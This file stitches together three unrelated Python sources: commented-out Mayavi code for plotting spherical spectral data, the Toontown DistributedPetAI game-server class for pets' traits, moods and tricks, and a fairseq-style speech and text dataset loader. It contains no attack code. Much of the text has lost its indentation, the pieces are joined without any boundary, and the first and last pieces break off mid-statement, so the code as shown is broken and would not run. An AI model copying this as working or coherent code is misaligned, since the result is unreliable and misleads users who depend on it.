# def plotSpherical(figure, dataset, vertices, triangles, ptitle='', tsize=0.4, theight=1):
# """Plot the spherical data given a data set, triangle set and vertex set.
# The vertex set defines the direction cosines of the individual samples.
# The triangle set defines how the surfrace must be structured between the samples.
# The data set defines, for each direction cosine, the length of the vector.
# Args:
# | figure(int): mlab figure number
# | dataset(np.array(double)): array of data set values
# | vertices(np.array([])): array of direction cosine vertices as [x y z]
# | triangles(np.array([])): array of triangles as []
# | ptitle(string): title or header for this display
# | tsize(double): title width in in normalised figure width
# | theight(double): title top vertical location in normalised figure height
# Returns:
# | provides an mlab figure.
# Raises:
# | No exception is raised.
# """
# #calculate a (x,y,z) data set from the direction vectors
# x = dataset * vertices[:,0]
# y = dataset * vertices[:,1]
# z = dataset * vertices[:,2]
# mlab.figure(figure, fgcolor=(0, 0, 0), bgcolor=(1, 1, 1))
# # Visualize the points
# pts = mlab.triangular_mesh(x, y, z, triangles )# z, scale_mode='none', scale_factor=0.2)
# mlab.title(ptitle, size=tsize, height=theight)
# #mayavi commented out
# ################################################################
# ##
# def plotOSSIMSpherical(basefigure, nColours, plottitle, datafile, vertexfile, trianglefile):
# """Plot the spherical data given a data set, triangle set and vertex set.
# The vertex set defines the direction cosines of the individual samples.
# The triangle set defines how the surface must be structured between the samples.
# The data set defines, for each direction cosine, the length of the vector.
# There is no means to discriminate between negative and pi phase shift.
# In this function we plot colour ratio values initially in absolute form,
# then only positive and then only negative values. In between these two
# shells the values are going through zero.
# Args:
# | basefigure (int): value where figure count must start
# | nColours ([int]): selection of colours to display
# | plottitle (string): plot title or header
# | datafile (string): dataset file filename
# | vertexfile (string): vertex file filename
# | trianglefile (string): triangles file filename
# Returns:
# | provides an mlab figure.
# Raises:
# | No exception is raised.
# """
# vertices = np.genfromtxt(vertexfile, autostrip=True,comments='%')
# triangles = np.genfromtxt(trianglefile, autostrip=True,comments='%')
# radianArray = np.loadtxt(datafile, skiprows=1, dtype = float)
# specBand = ['LWIR', 'MWIR', 'SWIR1', 'SWIR2']
# for i in nColours:
# dataset = radianArray[:,5+i]
# ptitle = '{0} {1}'.format(plottitle,specBand[i])
# plotSpherical(basefigure+10+i, dataset, vertices, | |
from pandac.PandaModules import *
from direct.showbase.PythonUtil import weightedChoice, randFloat, lerp
from direct.showbase.PythonUtil import contains, list2dict, clampScalar
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedSmoothNodeAI
from direct.distributed import DistributedSmoothNodeBase
from direct.distributed import ClockDelta
from direct.fsm import ClassicFSM, State
from direct.interval.IntervalGlobal import *
from toontown.toonbase import ToontownGlobals
from direct.task import Task
from toontown.pets import PetLookerAI
from toontown.pets import PetConstants, PetDNA, PetTraits
from toontown.pets import PetObserve, PetBrain, PetMood
from toontown.pets import PetActionFSM, PetBase, PetGoal, PetTricks
from direct.fsm import FSM
from toontown.toon import DistributedToonAI
from toontown.ai import ServerEventBuffer
import random
import time
import string
import copy
from direct.showbase.PythonUtil import StackTrace
from PetMoverAI import PetMoverAI
class DistributedPetAI(DistributedSmoothNodeAI.DistributedSmoothNodeAI, PetLookerAI.PetLookerAI, PetBase.PetBase):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPetAI')
movieTimeSwitch = {PetConstants.PET_MOVIE_FEED: PetConstants.FEED_TIME,
PetConstants.PET_MOVIE_SCRATCH: PetConstants.SCRATCH_TIME,
PetConstants.PET_MOVIE_CALL: PetConstants.CALL_TIME}
movieDistSwitch = {PetConstants.PET_MOVIE_FEED: PetConstants.FEED_DIST.get,
PetConstants.PET_MOVIE_SCRATCH: PetConstants.SCRATCH_DIST.get}
def __init__(self, air, dna = None):
DistributedSmoothNodeAI.DistributedSmoothNodeAI.__init__(self, air)
PetLookerAI.PetLookerAI.__init__(self)
self.ownerId = 0
self.petName = 'unnamed'
self.traitSeed = 0
self.safeZone = ToontownGlobals.ToontownCentral
self.initialDNA = dna
self.active = 1
self.activated = 0
self._outOfBounds = False
self.traitList = [0] * PetTraits.PetTraits.NumTraits
self.head = -1
self.ears = -1
self.nose = -1
self.tail = -1
self.bodyTexture = 0
self.color = 0
self.colorScale = 0
self.eyeColor = 0
self.gender = 0
self.movieMode = None
self.lockMoverEnabled = 0
self.trickAptitudes = []
self.inEstate = 0
self.estateOwnerId = None
self.estateZones = []
self.lastSeenTimestamp = self.getCurEpochTimestamp()
self.requiredMoodComponents = {}
self.__funcsToDelete = []
self.__generateDistTraitFuncs()
self.__generateDistMoodFuncs()
self.busy = 0
self.gaitFSM = ClassicFSM.ClassicFSM('petGaitFSM', [State.State('off', self.gaitEnterOff, self.gaitExitOff),
State.State('neutral', self.gaitEnterNeutral, self.gaitExitNeutral),
State.State('happy', self.gaitEnterHappy, self.gaitExitHappy),
State.State('sad', self.gaitEnterSad, self.gaitExitSad)], 'off', 'off')
self.gaitFSM.enterInitialState()
self.unstickFSM = ClassicFSM.ClassicFSM('unstickFSM', [State.State('off', self.unstickEnterOff, self.unstickExitOff), State.State('on', self.unstickEnterOn, self.unstickExitOn)], 'off', 'off')
self.unstickFSM.enterInitialState()
if __dev__:
self.pscMoveResc = PStatCollector('App:Show code:petMove:Reschedule')
return
def setInactive(self):
self.active = 0
def _initDBVals(self, ownerId, name = None, traitSeed = 0, dna = None, safeZone = ToontownGlobals.ToontownCentral):
self.b_setOwnerId(ownerId)
if name is None:
name = 'pet%s' % self.doId
self.b_setPetName(name)
self.b_setTraitSeed(traitSeed)
self.b_setSafeZone(safeZone)
traits = PetTraits.PetTraits(traitSeed, safeZone)
for traitName in PetTraits.getTraitNames():
setter = self.getSetterName(traitName, 'b_set')
self.__dict__[setter](traits.getTraitValue(traitName))
self.traits = traits
for component in PetMood.PetMood.Components:
setterName = self.getSetterName(component, 'b_set')
self.__dict__[setterName](0.0)
if not dna:
dna = PetDNA.getRandomPetDNA()
self.setDNA(dna)
self.b_setLastSeenTimestamp(self.getCurEpochTimestamp())
for component in PetMood.PetMood.Components:
self.setMoodComponent(component, 0.0)
self.b_setTrickAptitudes([])
return
def setDNA(self, dna):
head, ears, nose, tail, body, color, colorScale, eyes, gender = dna
self.b_setHead(head)
self.b_setEars(ears)
self.b_setNose(nose)
self.b_setTail(tail)
self.b_setBodyTexture(body)
self.b_setColor(color)
self.b_setColorScale(colorScale)
self.b_setEyeColor(eyes)
self.b_setGender(gender)
def handleZoneChange(self, newZoneId, oldZoneId):
DistributedSmoothNodeAI.DistributedSmoothNodeAI.handleZoneChange(self, newZoneId, oldZoneId)
self.ignore(PetObserve.getEventName(oldZoneId))
self.accept(PetObserve.getEventName(newZoneId), self.brain.observe)
def handleLogicalZoneChange(self, newZoneId, oldZoneId):
DistributedSmoothNodeAI.DistributedSmoothNodeAI.handleLogicalZoneChange(self, newZoneId, oldZoneId)
self.announceZoneChange(newZoneId, oldZoneId)
def announceZoneChange(self, newZoneId, oldZoneId):
DistributedPetAI.notify.debug('%s.announceZoneChange: %s->%s' % (self.doId, oldZoneId, newZoneId))
broadcastZones = list2dict([newZoneId, oldZoneId])
self.estateOwnerId = simbase.air.estateManager.getOwnerFromZone(newZoneId)
if self.estateOwnerId:
if __dev__:
pass
self.inEstate = 1
self.estateZones = simbase.air.estateManager.getEstateZones(self.estateOwnerId)
else:
self.inEstate = 0
self.estateZones = []
PetObserve.send(broadcastZones.keys(), PetObserve.PetActionObserve(PetObserve.Actions.CHANGE_ZONE, self.doId, (oldZoneId, newZoneId)))
def getOwnerId(self):
return self.ownerId
def b_setOwnerId(self, ownerId):
self.d_setOwnerId(ownerId)
self.setOwnerId(ownerId)
def d_setOwnerId(self, ownerId):
self.sendUpdate('setOwnerId', [ownerId])
def setOwnerId(self, ownerId):
self.ownerId = ownerId
def getPetName(self):
return self.petName
def b_setPetName(self, petName):
self.d_setPetName(petName)
self.setPetName(petName)
def d_setPetName(self, petName):
self.sendUpdate('setPetName', [petName])
def setPetName(self, petName):
self.petName = petName
DistributedSmoothNodeAI.DistributedSmoothNodeAI.setName(self, self.petName)
def getTraitSeed(self):
return self.traitSeed
def b_setTraitSeed(self, traitSeed):
self.d_setTraitSeed(traitSeed)
self.setTraitSeed(traitSeed)
def d_setTraitSeed(self, traitSeed):
self.sendUpdate('setTraitSeed', [traitSeed])
def setTraitSeed(self, traitSeed):
self.traitSeed = traitSeed
def getSafeZone(self):
return self.safeZone
def b_setSafeZone(self, safeZone):
self.d_setSafeZone(safeZone)
self.setSafeZone(safeZone)
def d_setSafeZone(self, safeZone):
self.sendUpdate('setSafeZone', [safeZone])
def setSafeZone(self, safeZone):
self.safeZone = safeZone
def setTraits(self, traitList):
self.traitList = traitList
def __generateDistTraitFuncs(self):
for i in xrange(PetTraits.PetTraits.NumTraits):
traitName = PetTraits.getTraitNames()[i]
getterName = self.getSetterName(traitName, 'get')
b_setterName = self.getSetterName(traitName, 'b_set')
d_setterName = self.getSetterName(traitName, 'd_set')
setterName = self.getSetterName(traitName)
def traitGetter(i = i):
return self.traitList[i]
def b_traitSetter(value, setterName = setterName, d_setterName = d_setterName):
self.__dict__[d_setterName](value)
self.__dict__[setterName](value)
def d_traitSetter(value, setterName = setterName):
self.sendUpdate(setterName, [value])
def traitSetter(value, i = i):
self.traitList[i] = value
self.__dict__[getterName] = traitGetter
self.__dict__[b_setterName] = b_traitSetter
self.__dict__[d_setterName] = d_traitSetter
self.__dict__[setterName] = traitSetter
self.__funcsToDelete.append(getterName)
self.__funcsToDelete.append(b_setterName)
self.__funcsToDelete.append(d_setterName)
self.__funcsToDelete.append(setterName)
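# Illustrative note (not in the source): the loop above stamps four bound accessors
# onto the instance per trait.  Assuming getSetterName() follows the usual
# "prefix + CapitalizedName" convention, a hypothetical trait named 'hunger' would
# get getHunger / b_setHunger / d_setHunger / setHunger, mirroring the hand-written
# DNA accessors below (getHead / b_setHead / ...).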
def getHead(self):
return self.head
def b_setHead(self, head):
self.d_setHead(head)
self.setHead(head)
def d_setHead(self, head):
self.sendUpdate('setHead', [head])
def setHead(self, head):
self.head = head
def getEars(self):
return self.ears
def b_setEars(self, ears):
self.d_setEars(ears)
self.setEars(ears)
def d_setEars(self, ears):
self.sendUpdate('setEars', [ears])
def setEars(self, ears):
self.ears = ears
def getNose(self):
return self.nose
def b_setNose(self, nose):
self.d_setNose(nose)
self.setNose(nose)
def d_setNose(self, nose):
self.sendUpdate('setNose', [nose])
def setNose(self, nose):
self.nose = nose
def getTail(self):
return self.tail
def b_setTail(self, tail):
self.d_setTail(tail)
self.setTail(tail)
def d_setTail(self, tail):
self.sendUpdate('setTail', [tail])
def setTail(self, tail):
self.tail = tail
def getBodyTexture(self):
return self.bodyTexture
def b_setBodyTexture(self, bodyTexture):
self.d_setBodyTexture(bodyTexture)
self.setBodyTexture(bodyTexture)
def d_setBodyTexture(self, bodyTexture):
self.sendUpdate('setBodyTexture', [bodyTexture])
def setBodyTexture(self, bodyTexture):
self.bodyTexture = bodyTexture
def getColor(self):
return self.color
def b_setColor(self, color):
self.d_setColor(color)
self.setColor(color)
def d_setColor(self, color):
self.sendUpdate('setColor', [color])
def setColor(self, color):
self.color = color
def getColorScale(self):
return self.colorScale
def b_setColorScale(self, colorScale):
self.d_setColorScale(colorScale)
self.setColorScale(colorScale)
def d_setColorScale(self, colorScale):
self.sendUpdate('setColorScale', [colorScale])
def setColorScale(self, colorScale):
self.colorScale = colorScale
def getEyeColor(self):
return self.eyeColor
def b_setEyeColor(self, eyeColor):
self.d_setEyeColor(eyeColor)
self.setEyeColor(eyeColor)
def d_setEyeColor(self, eyeColor):
self.sendUpdate('setEyeColor', [eyeColor])
def setEyeColor(self, eyeColor):
self.eyeColor = eyeColor
def getGender(self):
return self.gender
def b_setGender(self, gender):
self.d_setGender(gender)
self.setGender(gender)
def d_setGender(self, gender):
self.sendUpdate('setGender', [gender])
def setGender(self, gender):
self.gender = gender
def teleportIn(self, timestamp = None):
self.notify.debug('DPAI: teleportIn')
timestamp = ClockDelta.globalClockDelta.getRealNetworkTime()
self.notify.debug('DPAI: sending update @ ts = %s' % timestamp)
self.sendUpdate('teleportIn', [timestamp])
return None
def teleportOut(self, timestamp = None):
self.notify.debug('DPAI: teleportOut')
timestamp = ClockDelta.globalClockDelta.getRealNetworkTime()
self.notify.debug('DPAI: sending update @ ts = %s' % timestamp)
self.sendUpdate('teleportOut', [timestamp])
return None
def getLastSeenTimestamp(self):
return self.lastSeenTimestamp
def b_setLastSeenTimestamp(self, timestamp):
self.d_setLastSeenTimestamp(timestamp)
self.setLastSeenTimestamp(timestamp)
def d_setLastSeenTimestamp(self, timestamp):
        self.sendUpdate('setLastSeenTimestamp', [timestamp])
    def setLastSeenTimestamp(self, timestamp):
        self.lastSeenTimestamp = timestamp
    def getCurEpochTimestamp(self):
        return int(time.time())
    def getTimeSinceLastSeen(self):
        t = time.time() - self.lastSeenTimestamp
        return max(0.0, t)
    def __handleMoodSet(self, component, value):
        if self.isGenerated():
            self.mood.setComponent(component, value)
        else:
            self.requiredMoodComponents[component] = value
    def __handleMoodGet(self, component):
        if self.isGenerated():
            return self.mood.getComponent(component)
        else:
            return 0.0
    def __generateDistMoodFuncs(self):
        for compName in PetMood.PetMood.Components:
            getterName = self.getSetterName(compName, 'get')
            setterName = self.getSetterName(compName)
            def moodGetter(compName = compName):
                return self.__handleMoodGet(compName)
            def b_moodSetter(value, setterName = setterName):
                self.__dict__[setterName](value)
            def d_moodSetter(value, setterName = setterName):
                self.sendUpdate(setterName, [value])
            def moodSetter(value, compName = compName):
                self.__handleMoodSet(compName, value)
            self.__dict__[getterName] = moodGetter
            self.__dict__['b_%s' % setterName] = b_moodSetter
            self.__dict__['d_%s' % setterName] = d_moodSetter
            self.__dict__[setterName] = moodSetter
            self.__funcsToDelete.append(getterName)
            self.__funcsToDelete.append('b_%s' % setterName)
            self.__funcsToDelete.append('d_%s' % setterName)
            self.__funcsToDelete.append(setterName)
    def getTrickAptitudes(self):
        return self.trickAptitudes
    def b_setTrickAptitudes(self, aptitudes):
        self.setTrickAptitudes(aptitudes, local=1)
        self.d_setTrickAptitudes(aptitudes)
    def d_setTrickAptitudes(self, aptitudes):
        if __dev__:
            for aptitude in aptitudes:
                pass
        while len(aptitudes) < len(PetTricks.Tricks) - 1:
            aptitudes.append(0.0)
        self.sendUpdate('setTrickAptitudes', [aptitudes])
    def setTrickAptitudes(self, aptitudes, local = 0):
        if not local:
            DistributedPetAI.notify.debug('setTrickAptitudes: %s' % aptitudes)
        while len(self.trickAptitudes) < len(PetTricks.Tricks) - 1:
            self.trickAptitudes.append(0.0)
        self.trickAptitudes = aptitudes
    def getTrickAptitude(self, trickId):
        if trickId > len(self.trickAptitudes) - 1:
            return 0.0
        return self.trickAptitudes[trickId]
    def setTrickAptitude(self, trickId, aptitude, send = 1):
        aptitude = clampScalar(aptitude, 0.0, 1.0)
        aptitudes = self.trickAptitudes
        while len(aptitudes) - 1 < trickId:
            aptitudes.append(0.0)
        if aptitudes[trickId] != aptitude:
            aptitudes[trickId] = aptitude
            if send:
                self.b_setTrickAptitudes(aptitudes)
            else:
                self.setTrickAptitudes(aptitudes, local=1)
    def announceGenerate(self):
        DistributedSmoothNodeAI.DistributedSmoothNodeAI.announceGenerate(self)
        self._hasCleanedUp = False
        self.setHasRequestedDelete(False)
        self.b_setParent(ToontownGlobals.SPHidden)
        self.lockedDown = 0
        self.leashMode = 0
        self.leashAvId = None
        self.leashGoal = None
        self.trickLogger = ServerEventBuffer.ServerEventMultiAccumulator(self.air, 'petTricksPerformed', self.doId)
        self.trickFailLogger = ServerEventBuffer.ServerEventMultiAccumulator(self.air, 'petTricksFailed', self.doId)
        self.feedLogger = ServerEventBuffer.ServerEventAccumulator(self.air, 'petFeedings', self.doId)
        self.scratchLogger = ServerEventBuffer.ServerEventAccumulator(self.air, 'petScratchings', self.doId)
        self.traits = PetTraits.PetTraits(self.traitSeed, self.safeZone)
        if not hasattr(self, '_beingCreatedInDB'):
            for i in xrange(len(self.traitList)):
                value = self.traitList[i]
                if value == 0.0:
                    traitName = PetTraits.getTraitNames()[i]
                    traitValue = self.traits.getTraitValue(traitName)
                    DistributedPetAI.notify.info("%s: initializing new trait '%s' to %s, seed=%s" % (self.doId,
                        traitName,
                        traitValue,
                        self.traitSeed))
                    setterName = self.getSetterName(traitName, 'b_set')
                    self.__dict__[setterName](traitValue)
        self.mood = PetMood.PetMood(self)
        if not self.active:
            return
        self.activated = 1
        self.announceZoneChange(self.zoneId, ToontownGlobals.QuietZone)
        self.b_setParent(ToontownGlobals.SPRender)
        self.setPos(randFloat(-20, 20), randFloat(-20, 20), 0)
        self.setH(randFloat(360))
        if self.initialDNA:
            self.setDNA(self.initialDNA)
        for mood, value in self.requiredMoodComponents.items():
            self.mood.setComponent(mood, value, announce=0)
        self.requiredMoodComponents = {}
        self.brain = PetBrain.PetBrain(self)
        self.mover = PetMoverAI(self)
        self.enterPetLook()
        self.actionFSM = PetActionFSM.PetActionFSM(self)
        self.teleportIn()
        self.handleMoodChange(distribute=0)
        taskMgr.doMethodLater(simbase.petMovePeriod * random.random(), self.move, self.getMoveTaskName())
        self.startPosHprBroadcast()
        self.accept(PetObserve.getEventName(self.zoneId), self.brain.observe)
        self.accept(self.mood.getMoodChangeEvent(), self.handleMoodChange)
        self.mood.start()
        self.brain.start()
        return
    def _isPet(self):
        return 1
    def setHasRequestedDelete(self, flag):
        self._requestedDeleteFlag = flag
    def hasRequestedDelete(self):
        return self._requestedDeleteFlag
    def requestDelete(self, task = None):
        DistributedPetAI.notify.info('PetAI.requestDelete: %s, owner=%s' % (self.doId, self.ownerId))
        if self.hasRequestedDelete():
            DistributedPetAI.notify.info('PetAI.requestDelete: %s, owner=%s returning immediately' % (self.doId, self.ownerId))
            return
        self.setHasRequestedDelete(True)
        self.b_setLastSeenTimestamp(self.getCurEpochTimestamp())
        DistributedSmoothNodeAI.DistributedSmoothNodeAI.requestDelete(self)
    def _doDeleteCleanup(self):
        self.trickLogger.destroy()
        self.trickFailLogger.destroy()
        self.feedLogger.destroy()
        self.scratchLogger.destroy()
        del self.trickLogger
        del self.trickFailLogger
        del self.feedLogger
        del self.scratchLogger
        taskMgr.remove(self.uniqueName('clearMovie'))
        taskMgr.remove(self.uniqueName('PetMovieWait'))
        taskMgr.remove(self.uniqueName('PetMovieClear'))
        taskMgr.remove(self.uniqueName('PetMovieComplete'))
        taskMgr.remove(self.getLockMoveTaskName())
        taskMgr.remove(self.getMoveTaskName())
        if hasattr(self, 'zoneId'):
            self.announceZoneChange(ToontownGlobals.QuietZone, self.zoneId)
        else:
            myDoId = 'No doId'
            myTaskName = 'No task name'
            myStackTrace = StackTrace().trace
            myOldStackTrace = 'No Trace'
            if hasattr(self, 'doId'):
                myDoId = self.doId
            if task:
                myTaskName = task.name
            if hasattr(self, 'destroyDoStackTrace'):
                myOldStackTrace = self.destroyDoStackTrace.trace
            simbase.air.writeServerEvent('Pet RequestDelete duplicate', myDoId, 'from task %s' % myTaskName)
            simbase.air.writeServerEvent('Pet RequestDelete duplicate StackTrace', myDoId, '%s' % myStackTrace)
            simbase.air.writeServerEvent('Pet RequestDelete duplicate OldStackTrace', myDoId, '%s' % myOldStackTrace)
            DistributedPetAI.notify.warning('double requestDelete from %s' % myDoId)
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import itertools
import logging
import os
from random import sample
import sys
from typing import Any, List, Optional, Union
import numpy as np
import torch
import torch.nn.functional as F
from fairseq.data import data_utils
from fairseq.data.fairseq_dataset import FairseqDataset
from fairseq.data.audio.audio_utils import get_fbank
from g2p_en import G2p
logger = logging.getLogger(__name__)
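# Illustrative note (not from the original source): load_paired_data below splits each
# manifest line on ':' and strips the trailing key token of every field, so a 6-field
# line is assumed to look roughly like
#   utt:100-121-0001 path:/data/100-121-0001.wav phn:p1 p2 p3 wrd:w1 w2 size:16000
# while the 5-field variant omits the phoneme field. The key names above are hypothetical;
# only the positional layout (id, path, [phoneme], word, size) is relied on by the parser.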
def load_paired_data(manifest_path, max_keep, min_keep):
n_long, n_short = 0,0
data_dict, inds, sizes = [], [], []
with open(manifest_path) as f:
for ind, line in enumerate(f):
items = line.strip().split(":")
if len(items) ==6:
sz = int(items[5])
if min_keep is not None and sz < min_keep:
n_short += 1
elif max_keep is not None and sz > max_keep:
n_long += 1
else:
data_dict.append(
{
"id": items[1].split(" ")[0],
"path": items[2].split(" ")[0],
"phoneme": items[3].split(" ")[0:-1],
"word": items[4].split(" ")[0:-1],
"size": sz,
"style": "paired"
}
)
inds.append(ind)
sizes.append(sz)
elif len(items) == 5:
sz = int(items[4])
if min_keep is not None and sz < min_keep:
n_short += 1
elif max_keep is not None and sz > max_keep:
n_long += 1
else:
data_dict.append(
{
"id": items[1].split(" ")[0],
"path": items[2].split(" ")[0],
"word": items[3].split(" ")[0:-1],
"size": sz,
"style": "paired"
}
)
inds.append(ind)
sizes.append(sz)
tot = ind + 1
logger.info(
(
f"load paired data"
f"max_keep={max_keep}, min_keep={min_keep}, "
f"loaded {len(data_dict)}, skipped {n_short} short and {n_long} long, "
f"longest-loaded={max(sizes)}, shortest-loaded={min(sizes)}"
)
)
return data_dict, inds, sizes
def load_text_only_data(text_only_data_set_path, max_text, min_text):
n_long, n_short = 0.0, 0.0
data_dict, inds, sizes = [],[],[]
with open(text_only_data_set_path) as f:
for ind, line in enumerate(f):
word = line.strip().split(" ")
sz = len(word)
if min_text is not None and sz < min_text:
n_short+=1
elif max_text is not None and sz > max_text:
n_long+=1
else:
inds.append(ind)
data_dict.append(
{
"word": word,
"style": "text",
"size": sz
}
)
sizes.append(sz)
tot = ind + 1
logger.info(
(
f"load text only data"
f"max_keep={max_text}, min_keep={min_text}, "
f"loaded {len(data_dict)}, skipped {n_short} short and {n_long} long, "
f"longest-loaded={max(sizes)}, shortest-loaded={min(sizes)}"
)
)
return data_dict, inds, sizes
class AudioDataset(FairseqDataset):
def __init__(
self,
audio_path: str,
sample_rate: float,
max_keep_sample_size: int = None,
min_keep_sample_size: int = None,
label_processors: Optional[List[Any]] = None,
pad_list: List[str] = None,
eos_list: List[str] = None,
shuffle: bool = True,
pad_audio: bool = True,
normalize: bool = False,
fbank_bins: int = 80,
max_sample_size: int=100000000,
):
self.audio_data_dict, self.audio_inds, self.audio_sizes = load_paired_data(
audio_path, max_keep_sample_size, min_keep_sample_size
)
self.sample_rate = sample_rate
self.shuffle = shuffle
self.pad_list = pad_list
self.eos_list = eos_list
self.label_processors = label_processors
self.fbank_bins = fbank_bins
self.max_sample_size = max_sample_size
self.normalize = normalize
self.dataset = self
        self.pad_audio = pad_audio
        # crop_to_max_size checks self.random_crop, but it was never initialized;
        # default to False so over-long clips are cropped from the start (assumed intent).
        self.random_crop = False
def __getitem__(self, index):
wav = self.get_audio(index)
phoneme_token,bpe_token = self.get_label(index)
if phoneme_token is not None:
            '''
            Note: only tokens with index > 10 are kept, because indices 0-10 in the
            phoneme dictionary are reserved for special symbols (<eps>, SIL, SPN);
            consecutive repeated phonemes are also collapsed to a single token.
            '''
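            # Worked example with assumed token values: [5, 12, 12, 3, 15, 15] -> [12, 15]
            # (the leading token is skipped, tokens <= 10 are dropped, consecutive repeats collapse)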
phoneme_token_no_rep = torch.from_numpy(np.array( [ int(phoneme_token[i]) for i in range(1,len(phoneme_token)) if phoneme_token[i] > 10 and (i==1 or phoneme_token[i]!=phoneme_token[i-1]) ] ))
else:
phoneme_token_no_rep = None
return {"id": index, "source": wav, "phoneme": phoneme_token, "bpe":bpe_token, "phoneme_target": phoneme_token_no_rep}
def __len__(self):
return len(self.sizes)
@property
def sizes(self):
return self.audio_sizes
def ordered_indices(self):
if self.shuffle:
order = [np.random.permutation(len(self))]
else:
order = [np.arange(len(self))]
order.append(self.sizes)
return np.lexsort(order)[::-1]
def get_audio(self, index):
import soundfile as sf
wav_path = self.audio_data_dict[index]["path"]
wav, cur_sample_rate = sf.read(wav_path)
wav = torch.from_numpy(wav).float()
if self.normalize:
with torch.no_grad():
wav = F.layer_norm(wav, wav.shape)
return wav
def get_label(self, index):
data = self.audio_data_dict[index]
phoneme_token = None
if "phoneme" in data.keys():
phoneme_token = self.label_processors["phoneme"](data["phoneme"])
bpe_token = self.label_processors["word"](data["word"])
bpe_token = self.label_processors["bpe"](bpe_token)
return phoneme_token, bpe_token
def collater(self, samples):
# target = max(sizes) -> random_crop not used
# target = max_sample_size -> random_crop used for long
samples = [s for s in samples if s["source"] is not None]
if len(samples) == 0:
return {}
audios = [s["source"] for s in samples]
audio_sizes = [len(s) for s in audios]
if self.pad_audio:
audio_size = min(max(audio_sizes), self.max_sample_size)
else:
audio_size = min(min(audio_sizes), self.max_sample_size)
collated_audios, padding_mask, audio_starts = self.collater_audio(
audios, audio_size
)
if samples[0]["phoneme"] is not None:
phoneme_input = [s["phoneme"] for s in samples]
phoneme_target = [s["phoneme_target"] for s in samples]
phoneme_mask = self.phoneme_padding_mask(phoneme_input)
else:
phoneme_input = None
phoneme_target = None
phoneme_mask = None
bpe_target = [s["bpe"] for s in samples]
data_list, lengths_list, ntokens_list = self.collater_label(
phoneme_input, bpe_target, phoneme_target
)
net_input = {
"audio_source": collated_audios,
"padding_mask": padding_mask,
"prev_phoneme": data_list[0],
"phoneme_padding_mask": phoneme_mask,
"mode": "speech",
"lengths": ((torch.from_numpy(np.array(audio_sizes))- (400-320)) / 320).int()
}
batch = {
"id": torch.LongTensor([s["id"] for s in samples]),
"net_input": net_input,
}
batch["input_audio_length"] = (torch.from_numpy(np.array(audio_sizes)) - (400-320)) / 320
batch["phoneme_length"] = lengths_list[2]
batch["phoneme_ntoken"] = ntokens_list[2]
batch["phoneme_target"] = data_list[2]
batch["bpe_length"] = lengths_list[1]
batch["bpe_ntoken"] = ntokens_list[1]
batch["bpe_target"] = data_list[1]
return batch
def phoneme_padding_mask(self, phoneme_target):
phoneme_sizes = [ len(s) for s in phoneme_target]
max_size = max(phoneme_sizes)
batch_size = len(phoneme_target)
padd_mask = torch.zeros((batch_size, max_size)).bool()
for i, phoneme in enumerate(phoneme_target):
diff = max_size - len(phoneme)
if diff == 0:
continue
            else:
                # diff > 0 here (max_size is the batch maximum), so mark the padded tail
                padd_mask[i, -diff:] = True
return padd_mask
def crop_to_max_size(self, wav, target_size):
size = len(wav)
diff = size - target_size
if diff <= 0:
return wav, 0
start, end = 0, target_size
if self.random_crop:
start = np.random.randint(0, diff + 1)
end = size - diff + start
return wav[start:end], start
def collater_audio(self, audios, audio_size):
collated_audios = audios[0].new_zeros(len(audios), audio_size)
padding_mask = (
torch.BoolTensor(collated_audios.shape).fill_(False)
# if self.pad_audio else None
)
audio_starts = [0 for _ in audios]
for i, audio in enumerate(audios):
diff = len(audio) - audio_size
if diff == 0:
collated_audios[i] = audio
elif diff < 0:
assert self.pad_audio
collated_audios[i] = torch.cat(
[audio, audio.new_full((-diff,), 0.0)]
)
padding_mask[i, diff:] = True
else:
collated_audios[i], audio_starts[i] = self.crop_to_max_size(
audio, audio_size
)
return collated_audios, padding_mask, audio_starts
def collater_seq_label(self, targets, pad):
lengths = torch.LongTensor([len(t) for t in targets])
ntokens = lengths.sum().item()
targets = data_utils.collate_tokens(
targets, pad_idx=pad, left_pad=False
)
return targets, lengths, ntokens
def collater_label(self, phoneme_input, bpe_target, phoneme_target):
targets=[None,None,None]
lengths=[None,None,None]
ntokens=[None,None,None]
if phoneme_input is not None:
targets[0], lengths[0], ntokens[0] = self.collater_seq_label(
phoneme_input, self.pad_list[0]
)
targets[1], lengths[1], ntokens[1] = self.collater_seq_label(
bpe_target, self.pad_list[1]
)
if phoneme_target is not None:
targets[2], lengths[2], ntokens[2] = self.collater_seq_label(
phoneme_target, self.pad_list[0]
)
return targets, lengths, ntokens
def size(self, index):
return self.sizes[index]
def num_tokens(self, index: int):
return self.size(index)
class TextDataset(FairseqDataset):
def __init__(
self,
data_file_path: str,
lexicon_path: str,
accume_path: str,
max_text_num:int = None,
min_text_num:int = None,
data_process:Optional[List[Any]] = None,
shuffle: bool = True,
pad_list: List[str] = None,
eos_list: List[str] = None,
):
self.data_dict, self.inds, self.text_sizes = load_text_only_data(
data_file_path, max_text_num, min_text_num
)
self.shuffle = shuffle
self.pad_list = pad_list
self.dataset = self
self.lexicon = self.load_lexicon(lexicon_path)
self.accum_stat = self.load_accum_stat(accume_path)
self.data_process = data_process
self.g2p = G2p()
self.eos_list = eos_list
self.process_data_dict()
def process_data_dict(self):
for index in range(len(self.data_dict)):
self.data_dict[index]["phoneme"], self.data_dict[index]["bpe"],_ =self.get_labels(index)
self.sizes[index] = len(self.data_dict[index]["phoneme"])
def load_lexicon(self, lexicon_path):
lexicon = {}
with open(lexicon_path) as f:
for line in f.readlines():
item = line.strip().split()
lexicon[item[0]] = item[1:]
return lexicon
@property
def sizes(self):
return self.text_sizes
def avoid_zero(self, accum_stat,key):
prefix = key.split("_")[0]
if accum_stat[prefix+"_B"] + accum_stat[prefix+"_I"] + accum_stat[prefix+"_E"] + accum_stat[prefix+"_S"] ==0:
accum_stat[prefix+"_B"] =1
accum_stat[prefix+"_I"] =1
accum_stat[prefix+"_E"] =0
accum_stat[prefix+"_S"] =0
def load_accum_stat(self, accum_path):
accum_stat = {}
str_map = {}
store = []
with open(accum_path) as f:
for line in f.readlines():
item = line.strip().split()
accum_stat[item[0]]=int(item[1])
store.append(int(item[1]))
        min_count = np.min(store)
        max_count = np.max(store)
        scale = 8
        for key in accum_stat.keys():
            accum_stat[key] = int(((accum_stat[key] - min_count) / (max_count - min_count)) * scale)
for key in accum_stat.keys():
self.avoid_zero(accum_stat, key)
print(accum_stat)
for key in accum_stat.keys():
phoneme = key.split("_")[0]
if phoneme not in str_map.keys():
